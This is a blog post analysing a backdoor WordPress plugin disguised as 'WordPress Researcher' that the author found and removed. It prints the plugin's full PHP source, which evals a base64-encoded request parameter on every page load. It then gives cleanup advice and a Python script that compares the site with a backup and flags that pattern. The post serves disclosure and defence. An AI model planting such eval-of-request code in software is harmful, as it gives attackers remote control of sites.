WordPress Backdoor Plugin WordPress Researcher research__plugin.php

WordPress is the world's most popular CMS (this shouldn't set off an argument like “PHP is the best language”, right?), so it's only natural that WordPress gets “special treatment” from hackers. Recently, a plugin was inexplicably added to a couple of WordPress sites that I manage. The plugin's name is “WordPress Researcher”. At first glance the name looks like that of a perfectly normal plugin, but a closer look at the source code shows that it is without doubt a backdoor plugin. The source code is very simple, yet it injects a backdoor into our WordPress, so I deleted it decisively! The plugin's source file is as follows. Please enjoy.

<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
 
Copyright 2013 wordpressdotorg
 
 This program is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.
 
 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU General Public License for more details.
 
 You should have received a copy of the GNU General Public License
 along with this program; if not, write to the Free Software
 Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/
 
function research_plugin(){
  if (isset($_REQUEST['CSSl'])){
    eval(base64_decode($_REQUEST['CSSl']));
  } 
  return;
}
 
add_action('after_setup_theme', 'research_plugin');
?>

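The whole backdoor is research_plugin(): it is hooked to after_setup_theme, so it runs on every page load, and it passes the base64-decoded CSSl request parameter to eval(). Anyone who can send a request to the site can therefore execute arbitrary PHP on it.

Installed along with the WordPress Researcher plugin was another plugin, “Extend Calendar”. Judging by its code it is no good either, so delete it as well. Then upgrade the WordPress version and change the admin (back-end) password. If you are still not reassured, download the code of the entire site and compare it with a previous backup to see whether any other files have been modified by the plugin.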
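The backup comparison suggested above, as an added example in Python (not part of the original post): it lists files added or modified since the backup and flags PHP files that pass request data to eval() or assert(), the pattern used in research_plugin(). The directory layout and file names built in demo() are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# eval()/assert() fed request data, directly or through decoder calls:
# the shape of research_plugin() shown above.
EVAL_OF_REQUEST = re.compile(
    rb"\b(?:eval|assert)\s*\(\s*(?:@?\w+\s*\(\s*)*\$_(?:REQUEST|GET|POST|COOKIE)\b",
    re.IGNORECASE,
)


def tree(root):
    """Map relative path -> SHA-256 for every regular file under root."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*")
        if p.is_file()
    }


def audit(site_root, backup_root):
    """Return (added, modified, suspicious) sorted lists of relative paths."""
    site, backup = tree(site_root), tree(backup_root)
    added = sorted(set(site) - set(backup))
    modified = sorted(r for r in site.keys() & backup.keys() if site[r] != backup[r])
    suspicious = sorted(
        r for r in site
        if r.endswith(".php") and EVAL_OF_REQUEST.search((Path(site_root) / r).read_bytes())
    )
    return added, modified, suspicious


def demo():
    """Build a constructed backup/site pair in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        backup, site = Path(tmp, "backup"), Path(tmp, "site")
        for root in (backup, site):
            (root / "wp-content/plugins").mkdir(parents=True)
            (root / "index.php").write_text("<?php // constructed sample\n")
            (root / "wp-content/plugins/hello.php").write_text("<?php echo 'hi';\n")
        # Constructed changes: one edited file and one dropped plugin file.
        (site / "index.php").write_text("<?php // constructed sample, edited\n")
        bad = site / "wp-content/plugins/researcher.php"  # constructed file name
        bad.write_text("<?php eval(base64_decode($_REQUEST['CSSl'])); ?>\n")
        return audit(site, backup)
```

Call audit() with the downloaded site directory and the backup directory. A pattern match is a lead for manual review, and a clean result does not rule out a backdoor written in a different form.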
